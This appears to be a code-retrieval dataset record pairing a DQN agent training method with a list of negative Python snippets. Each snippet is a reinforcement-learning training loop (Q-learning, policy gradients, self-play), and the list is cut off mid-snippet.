def trainAgent(self): for episode in range(self.TOT_EPISODES): #reset environment, stacked frames every episode. state = self.env.reset() rewards = 0 #preprocess and stack the frame/state. state, self.stacked_frames = stack_frames(self.stack_size, self.stacked_frames, state, True) for step in range(self.MAX_STEPS): #for every step in episode: if (step%100==0): print("Episode No.: ", episode, "Step No.: ", step) #agent acts - explores or exploitation of the model action = self.dqn.predictAction(state) #reduce epsilon for more exploitation later. self.dqn.decayEpsilon() #Perform the action and get the next_state, reward, and done vals. next_state, reward, done, _ = self.env.step(action) #append this state to the frame. Pass the previous stacked frame. next_state, self.stacked_frames = stack_frames(self.stack_size, self.stacked_frames, next_state, False) rewards+=reward #add this experience into memory (experience buffer) self.dqn.remember(state, action, reward, next_state, done) state = next_state if done: print("took %d steps" %step) print("Earned a total of reward equal to ", rewards) break # TRAIN self.dqn.replay() #sync target_model and model weights every 10k steps. if step % 10000 == 9999: self.dqn.target_train() # Save the network every 1000 iterations if episode % 5 == 4: print("Saving Network") self.dqn.save_network(self.path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def train(self, num_episodes, max_episode_steps=100, save_freq=100, render=False):\n while self.episodes_done < num_episodes:\n self.trainOneEpisode(num_episodes, max_episode_steps, save_freq, render)\n self.saveCheckpoint()", "def train(self, training_steps=10):", "def train(\n self, num_episodes, max_episode_length, reward_network=None,\n ):\n\n for _ in range(num_episodes):\n self.train_episode(max_episode_length)\n\n if self.training_i % self.play_interval == 0:\n self.play(\n max_episode_length,\n self.render,\n reward_network=reward_network,\n )", "def train(self, iters, n_episodes):\n for i in range(iters):\n self.self_play(n_episodes)\n self.learn()", "def train_epoch(self) -> None:\n ct = self.config.training\n total_games = self._get_total_games()\n print(f\"Total Games: {total_games}\")\n train_size = int(0.9 * total_games)\n dataset_wrapper = DatasetWrapper(self.config)\n self.agent.model.fit(\n dataset_wrapper.get_dataset(train_size),\n epochs=ct.epoch_to_checkpoint,\n validation_data=dataset_wrapper.get_dataset(train_size, is_training=False),\n )", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.num_epochs):\n print(\"EPOHA\")\n self.run_epoch()\n print(\"SAVE MODEL\")\n self.save_model()", "def _train_model(self):\n self.experiment = EpisodicExperiment(self.task, self.agent)\n n_epochs = int(self.rl_params.n_training_episodes / self.rl_params.n_episodes_per_epoch)\n logger.debug(\"Fitting user model over {} epochs, each {} episodes, total {} episodes.\"\n .format(n_epochs, self.rl_params.n_episodes_per_epoch, n_epochs*self.rl_params.n_episodes_per_epoch))\n for i in range(n_epochs):\n logger.debug(\"RL epoch {}\".format(i))\n self.experiment.doEpisodes(self.rl_params.n_episodes_per_epoch)\n self.agent.learn()\n self.agent.reset() # reset buffers", "def train_by_episode(self):\n # only REINFORCE and REINFORCE with baseline\n # use the ff code\n # convert the rewards to returns\n rewards = []\n gamma = 0.99\n for item in self.memory:\n [_, _, _, reward, _] = item\n rewards.append(reward)\n # rewards = np.array(self.memory)[:,3].tolist()\n\n # compute return per step\n # return is the sum of rewards from t til end of episode\n # return replaces reward in the list\n for i in range(len(rewards)):\n reward = rewards[i:]\n horizon = len(reward)\n discount = [math.pow(gamma, t) for t in range(horizon)]\n return_ = np.dot(reward, discount)\n self.memory[i][3] = return_\n\n # train every step\n for item in self.memory:\n self.train(item, gamma=gamma)", "def train(n_episodes=1000, max_n_steps=300, eps_start=1.0, eps_end=0.01, eps_decay=0.995, strCheckpointFile='checkpoint.pth'):\n\n global env\n scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100) # last 100 scores\n eps = eps_start # initialize epsilon\n num_saves = 0\n for i_episode in range(1, n_episodes + 1):\n env_info = env.reset(train_mode=True)[brain_name] # reset the environment\n state = env_info.vector_observations[0] # get the current state\n score = 0 # initialize the score\n last_t = max_n_steps\n for t in range(max_n_steps):\n action = agent.act(state, eps) # agent returns an epsilon-greedy action based on state\n env_info = env.step(action)[brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n agent.step(state, action, reward, next_state, done) # records experience and learns (depending on settings)\n state = next_state\n score += reward\n if done:\n last_t = t + 1\n break\n scores_window.append(score) # save most recent score\n scores.append(score) # save most recent score\n eps = max(eps_end, eps_decay * eps) # decrease epsilon\n print('\\rEpisode {}\\tNum steps: {}\\tAverage Score: {:.2f}'.format(i_episode, last_t, np.mean(scores_window)))\n # if i_episode % 100 == 0:\n # print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n if np.mean(scores_window) >= 13: # win condition in course\n if num_saves == 0:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode - 100, np.mean(scores_window)))\n print('\\nTraining will continue and the checkpoint will be overwritten every 100 episodes')\n print('\\nSaving a checkpoint now, you may interrupt code execution with eg Ctrl+C')\n torch.save(agent.qnetwork_local.state_dict(), strCheckpointFile)\n else:\n if i_episode % 100 == 0:\n print('\\nSaving another checkpoint now, you may interrupt code execution with eg Ctrl+C')\n torch.save(agent.qnetwork_local.state_dict(), strCheckpointFile)\n num_saves += 1\n\n env.close()\n\n # plot the scores\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(np.arange(len(scores)), scores)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n # plt.show()\n plt.savefig('training_score_by_episode.png')\n return scores", "def learn(self, num_episodes=10000):\n for i in range(num_episodes):\n self.actor()\n self.learner()", "def train_model(num_episodes, model_version, discount_rate, learning_rate):\n\n # getting available models\n with open('model_architectures.yaml', 'r') as file:\n available_models = yaml.safe_load(stream = file)\n file.close()\n\n # input checks\n if type(num_episodes) != int:\n raise TypeError('num_episodes must be of type int')\n if num_episodes <= 0:\n raise ValueError('num_episodes must be greater than zero')\n if type(model_version) != str:\n raise TypeError('model_version must be of type string')\n if model_version not in available_models:\n raise ValueError('model_version not available')\n if type(discount_rate) != int and type(discount_rate) != float:\n raise TypeError('discount rate must be of type int or float')\n if discount_rate <= 0:\n raise ValueError('discount_rate must be greater than zero')\n if type(learning_rate) != float:\n raise TypeError('learning_rate must be of type float')\n if learning_rate <= 0 or learning_rate >= 1:\n raise ValueError('learning_rate must be within (0, 1)')\n\n # determining model sub-version\n model_sub_version_write = False\n sub_version = 0\n while not model_sub_version_write:\n if not os.path.exists(os.path.join('trained_models', model_version, model_version + '.' + str(sub_version) + '.0')):\n model_sub_version_write = True\n break\n sub_version += 1\n\n # building model\n model = eval(available_models[model_version])()\n optimizer = tf.keras.optimizers.Adam(learning_rate = learning_rate)\n compute_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits = True)\n\n # holding gradients\n gradient_holder = model.trainable_variables\n for i, gradient in enumerate(gradient_holder):\n gradient_holder[i] = gradient * 0\n\n # creating gym environment\n env = gym.make('CartPole-v1')\n env._max_episode_steps = 15000\n\n scores = []\n every_update = 5\n\n # training loop\n for episode in range(num_episodes + 1):\n observation = env.reset()\n\n episode_memory = []\n episode_score = 0\n done = False\n\n while not done:\n\n # creates vector of form [Position, Velocity, Angle, Angular Velocity]\n observation = observation.reshape([1, 4])\n\n with tf.GradientTape() as tape:\n\n # creating loss function and action\n logits = model(observation)\n a_dist = logits.numpy()\n action = np.random.choice(a = a_dist[0], p = a_dist[0])\n action = np.argmax(a_dist == action)\n loss = compute_loss([action], logits)\n\n # performing action and getting feedback from environment\n observation, reward, done, info = env.step(action)\n\n episode_score += reward\n\n # trick for quicker convergence\n if done:\n reward -= 10\n\n # getting gradients\n gradients = tape.gradient(target = loss, sources = model.trainable_variables)\n episode_memory.append([gradients, reward])\n\n scores.append(episode_score)\n\n # discounting rewards\n episode_memory = np.array(episode_memory)\n episode_memory[:, 1] = discount_rewards(rewards = episode_memory[:, 1], discount_rate = discount_rate)\n\n # applying rewards to corresponding gradients\n for grads, reward in episode_memory:\n for i, grad in enumerate(grads):\n gradient_holder[i] += grad * reward\n\n # back-propagating gradients, resetting gradients\n if episode % every_update == 0:\n optimizer.apply_gradients(zip(gradient_holder, model.trainable_variables))\n for i, grad in enumerate(gradient_holder):\n gradient_holder[i] = grad * 0\n\n if episode % 100 == 0:\n print('Episode {} Score {}'.format(episode, np.mean(scores[-20:])))\n tf.keras.models.save_model(model = model,\n filepath = os.path.join('trained_models', model_version, model_version + '.' +\n str(sub_version) + '.{}'.format(episode)))\n\n final_performance = int(round(np.mean(scores[-20:])))\n\n # dumping training results into yaml file\n yaml_dump = {}\n yaml_dump['Model Version'] = model_version\n yaml_dump['Model Sub-version'] = sub_version\n yaml_dump['Number of Training Episodes'] = num_episodes\n yaml_dump['Discount Rate'] = discount_rate\n yaml_dump['Learning Rate'] = learning_rate\n yaml_dump['Final Performance'] = final_performance\n\n with open(os.path.join('trained_models', model_version, model_version + '.' + str(sub_version) + '_training_details.yaml'), 'w') as file:\n yaml.dump(data = yaml_dump, stream = file)\n file.close()", "def train(self, num_episodes=10000):\n\n self.game.restart()\n\n self.exp_states = defaultdict(int)\n\n for i in tqdm(range(num_episodes)):\n\n self.game.deal_cards()\n\n possible_actions = self.game.get_actions()\n\n player_state = self.game.get_player_state()\n player_action = self.player.get_action(player_state,\n possible_actions,\n explore_exploit='explore')\n\n # Bookkeep visited states (?)\n player_state_str = np.array2string(player_state)\n self.exp_states[player_state_str] += 1\n\n opponent_state = self.game.get_opponent_state()\n opponent_action = self.opponent.get_action(opponent_state,\n possible_actions)\n\n self.game.set_player_action(player_action)\\\n .set_opponent_action(opponent_action)\n\n player_score, opponent_score = self.game.get_scores()\n\n reward = self._get_reward(player_score, opponent_score)\n self.player.learn(player_state,\n player_action,\n reward)\n self.player.learn(opponent_state,\n opponent_action,\n -reward)\n \n print(\"Training done!\")", "def train(self, env):\n\n\t\tmin_average_reward_for_stopping = 195\n\t\tconsecutive_successful_episodes_to_stop = 10\n\t\tlast_10_rewards = deque(maxlen=consecutive_successful_episodes_to_stop)\n\n\t\tnum_Episodes = []\n\t\tEpisode_Rewards = []\n\n\t\tfor episode in range(self.episodes):\n\t\t\tstate = env.reset()\n\t\t\tstate = np.reshape(state, [1, self.state_size])\n\t\t\tdone = False\n\t\t\ttotal_reward = 0\n\n\t\t\twhile not done:\n\t\t\t\taction = self.act(state)\n\t\t\t\tnext_state, reward, done, _ = env.step(action)\n\t\t\t\tnext_state = np.reshape(next_state, [1, self.state_size])\n\t\t\t\tself.remember(state, action, reward, next_state, done)\n\t\t\t\tstate = next_state\n\t\t\t\ttotal_reward += reward\n\n\t\t\tnum_Episodes.append(episode)\n\t\t\tEpisode_Rewards.append(total_reward)\n\t\t\tlast_10_rewards.append(total_reward)\n\t\t\tlast_10_avg_reward = np.mean(last_10_rewards)\n\t\t\tprint(episode, last_10_avg_reward)\n\n\t\t\t# call experience relay\n\t\t\tif len(self.memory) >= self.batch_size:\n\t\t\t\tself.replay(self.batch_size)\n\t\t\t# Stopping criteria\n\t\t\tif len(\n\t\t\t\t\tlast_10_rewards) == consecutive_successful_episodes_to_stop \\\n\t\t\t\t\tand last_10_avg_reward > min_average_reward_for_stopping:\n\t\t\t\tprint(\"Solved after {} epsiodes\".format(episode))\n\t\t\t\tbreak", "def train(self, episodes, epsilon_initial, epsilon_min, epsilon_stop_episode,\n network_update_freq, gamma, memory_capacity, batch_size):\n\n memory = ReplayMemory(memory_capacity)\n\n tot_steps = 0\n running_loss = 0\n\n depsilon = (epsilon_initial-epsilon_min)/epsilon_stop_episode\n\n for episode in range(episodes):\n\n if epsilon_initial > epsilon_min:\n epsilon_initial -= depsilon\n\n if episode % network_update_freq == 0:\n # Update target network\n self.NN_target.load_state_dict(self.NN.state_dict())\n\n if (episode + 1) % 10 == 0:\n print(f'Episode {episode + 1}/{episodes} completed!')\n print(f'Average steps per episode: {tot_steps / 10}')\n writer.add_scalar('training loss', running_loss / tot_steps, episode)\n self.plotValue()\n tot_steps = 0\n running_loss = 0\n\n state, done = self.env.reset()\n\n\n while not done:\n tot_steps += 1\n\n action = self.chooseAction(epsilon_initial, state)\n\n reward, next_state, done= self.env.transitionState(state, action)\n\n #score += reward\n reward = torch.tensor([[reward]], device=device)\n done = torch.tensor([[done]], device=device)\n\n # Saves the transition\n memory.push(self.RBF[state], self.RBF[next_state], reward, done)\n\n # Perform one step of batch gradient descent\n running_loss += self.optimizeModel(memory, batch_size, gamma)\n\n state = next_state\n\n writer.close()", "def train_prediction(self, episodes=100, batch_size=32, steps=100):\n hidden_state = None\n for episode in range(episodes):\n state_data = self.env.dataset(batch_size=batch_size)\n state = self.state_to_observation(state_data)\n\n prediction = self.model(state, hidden_state)\n loss = F.mse_loss(prediction['value'], state_data['reward'])\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()", "def train_network(self, batch, episode_nr):\n global eps, eps_min, eps_decay\n for exp in batch:\n S = exp[0]\n S = process_state(S)\n action_number = exp[1]\n r = exp[2]\n S_new = exp[3]\n S_new = process_state(S_new)\n terminal = exp[4]\n\n if not terminal: # If agent is not at its final destination\n target = (r + gamma*np.amax(self.target.predict(S_new)[0]))\n else:\n target = r\n target_f = self.policy.predict(S)\n\n target_f[0][action_number] = target # Update something???\n self.policy.fit(S, target_f, epochs=1, verbose=0) # Train network # Verbose - makes training line?\n if self.epsilon > self.eps_min and episode_nr > 10:\n self.epsilon *= self.eps_decay # Decrease exploration rate", "def train(self, num_tickers=4, episodes_per_ticker=5, **kwargs):\n num_tickers = min(num_tickers, len(self.filtered_tickers))\n for i in range(num_tickers):\n ticker = self.filtered_tickers[i % num_tickers]\n env = self.ENV_CONSTRUCTOR(ticker=ticker, **kwargs)\n for j in tqdm(range(episodes_per_ticker)):\n history = self.run_episode(env)\n history[\"ticker\"] = ticker\n history[\"episode\"] = j + 1\n history[\"t\"] = range(len(history))\n self.history = pd.concat((self.history, history))\n self.history = self.history.reset_index(\"Date\", drop=True)", "def train(self, num_decisions=350):\n os.system(\"mkdir \" + self.folder_name + \"Train\")\n for i in range(5000):\n episode_folder_name = self.folder_name + \"Train/\" + str(i) + \"/\"\n all_system_states = []\n all_system_rewards = []\n all_system_states_cluster = []\n all_grid_states_cluster = []\n all_surrounding_states_cluster = []\n os.system(\"mkdir \" + episode_folder_name)\n filename = episode_folder_name + str(i) + \".h5\"\n self.system.reset_context(filename)\n self.system.run_decorrelation(20)\n grid_dist, surrounding_dist, _, _, _, _ = self.system.get_state_reward()\n state = self._get_state(grid_dist, surrounding_dist)\n for j in range(num_decisions):\n action_index = self._get_action(state, i)\n transition_to_add = [state, action_index]\n tag = \"_train_\" + str(j)\n actions = [self.all_actions[i] for i in action_index]\n try:\n self.system.update_action(actions)\n system_states, system_rewards, system_states_cluster = self.system.run_step(\n is_detailed=True, tag=tag)\n all_system_states.append(system_states)\n all_system_rewards.append(system_rewards)\n all_system_states_cluster.append(system_states_cluster)\n\n except OpenMMException:\n print(\"Broken Simulation at Episode:\",\n str(i), \", Decision:\", str(j))\n break\n\n grid_dist, surrounding_dist, grid_reward, surrounding_reward, grid_states_cluster, surrounding_states_cluster = self.system.get_state_reward()\n state = self._get_state(grid_dist, surrounding_dist)\n reward = self._get_reward(grid_reward, surrounding_reward)\n\n all_grid_states_cluster.append(grid_states_cluster)\n all_surrounding_states_cluster.append(surrounding_states_cluster)\n\n # Use len_reward for number of grids\n done = [False] * len(reward) # Never Done\n transition_to_add.extend([reward, state, done])\n rb_decision_samples = 0\n for rb_tuple in zip(*transition_to_add):\n self.buffer.push(*list(rb_tuple))\n\n for _ in range(self.update_num):\n self._update()\n self._save_episode_data(episode_folder_name)\n np.save(episode_folder_name + \"system_states\",\n np.array(all_system_states))\n np.save(episode_folder_name + \"system_rewards\",\n np.array(all_system_rewards))\n np.save(episode_folder_name + \"system_states_cluster\",\n np.array(all_system_states_cluster))\n np.save(episode_folder_name + \"grid_states_cluster\",\n np.array(all_grid_states_cluster, dtype=object))\n np.save(episode_folder_name + \"all_states_cluster\",\n np.array(all_surrounding_states_cluster))\n self._save_data()", "def trainOneEpisode(self, num_episodes, max_episode_steps=100, save_freq=100, render=False):\n # tqdm.write('------Episode {} / {}------'.format(self.episodes_done, num_episodes))\n self.resetEnv()\n r_total = 0\n with trange(1, max_episode_steps+1, leave=False) as t:\n\n for step in t:\n if render:\n self.env.render()\n state = self.state\n action, q = self.selectAction(state, require_q=True)\n obs_, r, done, info = self.takeAction(action.item())\n # if print_step:\n # print 'step {}, action: {}, q: {}, reward: {} done: {}' \\\n # .format(step, action.item(), q, r, done)\n r_total += r\n # t.set_postfix(step='{:>5}'.format(step), q='{:>5}'.format(round(q, 4)), total_reward='{:>5}'.format(r_total))\n t.set_postfix_str('step={:>5}, q={:>5}, total_reward={:>5}'.format(step, round(q, 2), r_total))\n if done or step == max_episode_steps:\n next_state = None\n else:\n next_state = self.getNextState(obs_)\n reward = torch.tensor([r], device=self.device, dtype=torch.float)\n self.memory.push(state, action, next_state, reward)\n self.optimizeModel()\n if self.steps_done % self.target_update == 0:\n self.target_net.load_state_dict(self.policy_net.state_dict())\n\n if done or step == max_episode_steps - 1:\n tqdm.write('------Episode {} ended, total reward: {}, step: {}------' \\\n .format(self.episodes_done, r_total, step))\n tqdm.write('------Total steps done: {}, current e: {} ------' \\\n .format(self.steps_done, self.exploration.value(self.steps_done)))\n # print '------Episode {} ended, total reward: {}, step: {}------' \\\n # .format(self.episodes_done, r_total, step)\n # print '------Total steps done: {}, current e: {} ------' \\\n # .format(self.steps_done, self.exploration.value(self.steps_done))\n self.episodes_done += 1\n self.episode_rewards.append(r_total)\n self.episode_lengths.append(step)\n if self.episodes_done % save_freq == 0:\n self.saveCheckpoint()\n break\n self.state = next_state", "def train(self, episodes=2000, max_steps=99):\n\n for episode in range(episodes):\n state = self.env.reset()\n\n for step in range(max_steps):\n explore_eploit_tradeoff = np.random.uniform()\n\n if explore_eploit_tradeoff > self.epsilon:\n action = np.argmax(self.q_table[state, :])\n else:\n action = self.env.action_space.sample()\n\n new_state, reward, done, info = self.env.step(action)\n\n self.q_table[state, action] = self.q_table[state, action] \\\n + self.lr * (reward + self.gamma * np.amax(\n self.q_table[new_state, :]\n ) - self.q_table[state, action]\n )\n\n state = new_state\n if done:\n break\n exp_ = np.exp(-self.decay_rate * episode)\n self.epsilon = self.min_eps + exp_ * (self.max_eps - self.min_eps)", "def on_train_begin(self, logs):\n print(f\"Testing for {self.params['nb_episodes']} episodes ...\")", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.opt.num_epochs):\n self.run_epoch()\n if (self.epoch + 1) % self.opt.save_frequency == 0:\n self.save_model()", "def train(\r\n self,\r\n max_episodes : int,\r\n exploration_rate=0.9,\r\n discount=0.9,\r\n batch_size=32,\r\n timesteps_per_episode=200,\r\n warm_start=False,\r\n model_alignment_period=100,\r\n save_animation_period=100,\r\n save_model_period=10,\r\n evaluate_model_period=50,\r\n evaluation_size=10,\r\n exploration_rate_decay=0.99,\r\n min_exploration_rate=0.1,\r\n epochs=1,\r\n log_q_values=False) -> Controller:\r\n\r\n # Log training parameters\r\n params = {\r\n \"max_episodes\": max_episodes,\r\n \"exploration_rate\": exploration_rate,\r\n \"discount\": discount,\r\n \"batch_size\": batch_size,\r\n \"timesteps_per_episode\": timesteps_per_episode,\r\n \"model_alignment_period\": model_alignment_period,\r\n \"evaluate_model_period\": evaluate_model_period,\r\n \"evaluation_size\": evaluation_size,\r\n \"exploration_rate_decay\": exploration_rate_decay,\r\n \"min_exploration_rate\": min_exploration_rate,\r\n \"epochs\": epochs\r\n }\r\n self.params.update(params)\r\n self.Logger.log_params(self.params)\r\n\r\n # Load existing model for warm start\r\n if warm_start:\r\n check = self._load_model()\r\n if not check:\r\n print(\"Using default network\") # TODO: temp solution\r\n\r\n max_reward = -100\r\n for episode in range(1, max_episodes + 1):\r\n t1 = time.time()\r\n total_reward = 0\r\n eval_score = 0\r\n terminated = False\r\n steps = 0\r\n state = self.environment.reset(random=True) # start from random state\r\n\r\n # TODO: Check if possible to avoid reshape!!\r\n state = state[self.idx].reshape(1, self.state_size)\r\n\r\n for timestep in range(timesteps_per_episode):\r\n # Predict which action will yield the highest reward.\r\n action = self._act(state, exploration_rate,log_q_values)\r\n\r\n # Take the system forward one step in time.\r\n next_state = self.environment.step(action)\r\n\r\n # Compute the actual reward for the new state the system is in.\r\n current_time = timestep * self.environment.step_size\r\n reward = self.environment.reward(next_state, current_time)\r\n\r\n # Check whether the system has entered a terminal case.\r\n terminated = self.environment.terminated(next_state, current_time)\r\n\r\n # TODO: Can this be avoided?\r\n next_state = next_state[self.idx].reshape(1, self.state_size)\r\n\r\n # Store results for current step.\r\n self._store(state, action, reward, next_state, terminated)\r\n\r\n # Update statistics.\r\n total_reward += reward\r\n state = next_state\r\n steps = timestep+1\r\n\r\n if len(self.experience) >= batch_size:\r\n self._experience_replay(batch_size, discount, epochs)\r\n #exploration_rate *= exploration_rate_decay\r\n\r\n # Terminate episode if the system has reached a termination state.\r\n if terminated:\r\n break\r\n\r\n # Log the average loss for this episode\r\n\r\n self.Logger.log_loss(np.mean(self.episode_loss), episode)\r\n self.episode_loss = []\r\n\r\n # Log the average Q-values for this episode\r\n if log_q_values:\r\n self.Logger.log_q_values(self.episode_q_values/steps, episode)\r\n self.episode_q_values = np.zeros(len(self.environment.action_space))\r\n\r\n if exploration_rate > min_exploration_rate:\r\n exploration_rate *= exploration_rate_decay\r\n else:\r\n exploration_rate = min_exploration_rate\r\n t2 = time.time()\r\n print(\r\n f\"Episode: {episode:>5}, \"\r\n f\"Score: {total_reward:>10.1f}, \"\r\n f\"Steps: {steps:>4}, \"\r\n f\"Simulation Time: {(steps * self.environment.step_size):>6.2f} Seconds, \"\r\n f\"Computation Time: {(t2-t1):>6.2f} Seconds, \"\r\n f\"Exploration Rate: {exploration_rate:>0.3f}\")\r\n\r\n if episode % model_alignment_period == 0:\r\n self._align_target_model()\r\n\r\n # if episode % save_animation_period == 0:\r\n # self.environment.save(episode)\r\n\r\n\r\n if episode % evaluate_model_period == 0:\r\n eval_score = self._evaluate(evaluation_size, max_steps=timesteps_per_episode,episode=episode)\r\n\r\n if eval_score > max_reward:\r\n self._save_model(\"best\")\r\n max_reward = eval_score\r\n\r\n self._save_model(\"latest\")\r\n\r\n # Create Controller object\r\n controller = Controller(self.environment.get_action_space(), self.q_network, self.idx)\r\n print(\"Controller Created\")\r\n return controller", "def train(self, n_episodes):\n for episode in trange(n_episodes):\n policy_loss, entropy, episode_reward = self.train_step()\n self.writer.add_scalar('policy_loss', policy_loss, episode)\n self.writer.add_scalar('entropy', entropy, episode)\n self.writer.add_scalar('episode_reward', episode_reward, episode)", "def train(self, max_episodes= 1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n success = False\n i_episode = 0\n eps = eps_start\n \n print('Training in progress...')\n for i in range(max_episodes):\n score = self.run_training_episode(eps=eps)\n \n self.score_window.append(score)\n self.score_record.append(np.mean(self.score_window))\n \n i_episode += 1\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n\n if i_episode%100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n \n if i_episode>100:\n if np.mean(self.score_window)>self.criteria:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n success = True\n break\n\n if success:\n print('Criteria reached after {} episodes'.format(i_episode))\n else:\n print('Failed to reach Criteria after {} episodes'.format(i_episode))\n\n self.plot_training_progress()\n return success", "def train(self, batch_size=64, n_episodes=100, max_episode_length=3000, save_path=\"last_save.h5\",\n load_path=None):\n\n self.explore = True # Explore if needed\n\n self._play_through(n_episodes=n_episodes, max_episode_length=max_episode_length, save_path=save_path,\n callbacks=self._train_callbacks_factory())", "def train(self, num_batches: int):", "def train(self, num_episodes = 10000, verbose = True):\n start_time = datetime.now().replace(microsecond=0)\n for e in range(num_episodes):\n S_old = self.env.reset()\n steps = 0\n # there is an interal limit of 100 steps\n while steps < 1000:\n steps += 1\n A = self.epsilon_greedy(S_old)\n S_new, reward, done, info = self.env.step(A)\n self.Q[S_old, A] = self.Q[S_old, A] + self.alpha * \\\n (reward + self.gamma * np.max(self.Q[S_new, :]) - self.Q[S_old, A])\n if done:\n break\n S_old = S_new\n if verbose:\n clear_output(wait=True)\n now_time = datetime.now().replace(microsecond=0)\n print(\"Epoch: {}/{} - Steps: {:4} - Duration: {}\".format(e+1, num_episodes, steps, now_time-start_time))\n\n return self.Q", "def train_episode(self):\n state = self.env.reset()\n states = []\n actions = []\n rewards = []\n for _ in range(self.options.steps):\n probs = self.actor_baseline.predict([[state]])[0][0]\n action = np.random.choice(len(probs), p=probs)\n\n next_state, reward, done, _ = self.step(action)\n states.append(state)\n actions.append(action)\n rewards.append(reward)\n\n state = next_state\n\n if done:\n break\n\n # Compute and store returns in G\n G = np.zeros_like(rewards)\n ################################\n # YOUR IMPLEMENTATION HERE #\n ################################\n\n # One-hot encoding for actions\n actions_one_hot = np.zeros([len(actions), self.env.action_space.n])\n actions_one_hot[np.arange(len(actions)), actions] = 1\n\n # Compute one-hot encoded deltas\n ################################\n # YOUR IMPLEMENTATION HERE #\n ################################\n deltas = [[0]]\n\n # Update actor and state estimator\n self.actor_baseline.fit(x=[np.array(states)],\n y={'actor_output': deltas, 'baseline_output': returns},\n epochs=1, batch_size=self.options.batch_size, verbose=0)", "def train(Game, agent, episodes=1000):\n a = agent\n # eps_start = a.epsilon\n # eps_end = a.epsilon_min\n # eps_dec = np.exp(1/episodes * np.log(eps_end/eps_start))\n # a.epsilon_decrement = eps_dec\n times_taken = np.zeros(episodes)\n print(\"Training starting\")\n for n in range(episodes):\n start_time = time.time()\n g = Game()\n print(\"EPISODE\", n+1)\n while not g.success:\n state = 1.0*g.get_state()\n action = a.action(state)\n reward = g.play(action)\n # print(g.success)\n # print(\"reward: \", reward)\n # print(state)\n # print(action)\n # print(g.get_state())\n a.train(state, action, reward, g.get_state(), g.success)\n end_time = time.time()\n times_taken[n] = end_time - start_time\n print(\"Training complete ({} episodes)\".format(episodes))\n return times_taken", "def train_epoch(self):\n\n if self._train_data_set is not None and self._train_data_set is not None:\n self._model.fit_num_epochs(self._train_data_set, self._test_data_set)\n else:\n raise RuntimeError(\"[Triggerbot]: No training or test set available\")", "def learn(self):\n epochswin = [] # count the number of wins at every epoch of the network against the preceding version\n epochdraw = [] # count the number of draws at every epoch of the network against the preceding version\n epochswingreedy = [] # count the number of wins against greedy at every epoch\n epochswinrandom = [] # count the number of wins against random at every epoch\n epochsdrawgreedy = [] # count the number of draws against greedy at every epoch\n epochsdrawrandom = [] # count the number of wins against random at every epoch\n epochswinminmax = [] # count the number of wins against minmax at every epoch\n epochsdrawminmax = [] # count the number of draws against minmax at every epoch\n\n\n if self.args.load_model == True:\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \".txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswin.append(word)\n elif index == 1:\n epochdraw.append(word)\n file.close()\n\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \":greedyrandom.txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswingreedy.append(word)\n elif index == 1:\n epochsdrawgreedy.append(word)\n elif index == 2:\n epochswinrandom.append(word)\n elif index == 3:\n epochsdrawrandom.append(word)\n elif index == 4:\n epochswinminmax.append(word)\n elif index == 5:\n epochsdrawminmax.append(word)\n file.close()\n self.loadTrainExamples()\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n print('------ITER ' + str(i) + '------')\n # examples of the iteration\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n eps_time = AverageMeter()\n bar = Bar('Self Play', max=self.args.numEps)\n end = time.time()\n\n for eps in range(self.args.numEps):\n iterationTrainExamples += self.executeEpisode()\n\n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=eps + 1,\n maxeps=self.args.numEps,\n et=eps_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td)\n bar.next()\n bar.finish()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(self.trainExamplesHistory),\n \" => remove the oldest trainExamples\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1)\n self.saveTrainExamples(i - 1)\n\n # shuffle examlpes before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n exists = os.path.isfile(filenameBest)\n if exists:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n pmcts = MCTS(self.game, 